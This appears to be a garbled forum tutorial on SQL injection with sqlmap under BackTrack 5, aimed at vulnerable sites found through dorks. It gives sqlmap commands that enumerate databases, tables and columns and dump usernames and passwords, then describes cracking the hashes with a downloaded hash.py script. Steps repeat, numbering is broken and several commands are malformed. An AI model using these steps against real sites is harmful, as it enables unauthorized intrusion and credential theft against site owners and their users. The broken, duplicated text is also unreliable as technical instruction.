Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.
1. Open up sqlmap
2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns 3. Now, it’s time for the codes
Looks like this:
3. Once we have the DBS, it’s time to get the tables.
We need to get the columns.
Now, we need to write:
We need to dump the files.
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
If you wanna use the offline method, you need a wordlist.
Quote:
[dbname] = Database name; [tbname] = Table name; [cmname] = Column name. |
1. Open up sqlmap
This image has been resized.Click to view original image |
2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns 3. Now, it’s time for the codes
With this command, you’ll be able to extract the databases.Quote:
./sqlmap.py -u website.com/index.php?id=? --dbs
Looks like this:
3. Once we have the DBS, it’s time to get the tables.
4. After we get the tables which looks like this:Quote:
./sqlmap website.php/index.php?id=? -D [dbname] --tables
We need to get the columns.
Now, we need to write:
5. Once we get the columnsQuote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns
This image has been resized.Click to view original image |
We need to dump the files.
Example .sqlmap.py -u website.com/index.php?id=? -D information_shema -T users -C username --dumpQuote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cbname] --dump
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py
http://uploading.com/ee6e71ed/hash-py1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
We have Online & Offline attack methods.Quote:
/root/hash.py
If you wanna use the offline method, you need a wordlist.